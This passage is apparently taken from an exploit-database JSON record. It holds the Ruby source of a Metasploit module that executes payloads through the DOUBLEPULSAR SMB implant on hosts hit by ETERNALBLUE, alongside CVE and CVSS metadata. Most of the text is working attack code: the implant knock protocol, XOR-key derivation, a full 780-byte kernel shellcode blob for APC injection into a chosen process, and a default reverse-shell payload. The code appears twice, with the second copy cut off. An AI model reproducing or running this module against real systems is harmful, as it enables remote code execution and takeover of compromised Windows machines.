[true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-22] #"}, "lastseen": "2021-10-21T22:28:12", "differentElements": ["sourceData"], "edition": 52}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "352579dc5d641f54ed1b328f46037dc4", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-23T18:17:17", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-21T22:28:12", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-21T22:28:12", "rev": 2}}, 
"objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No 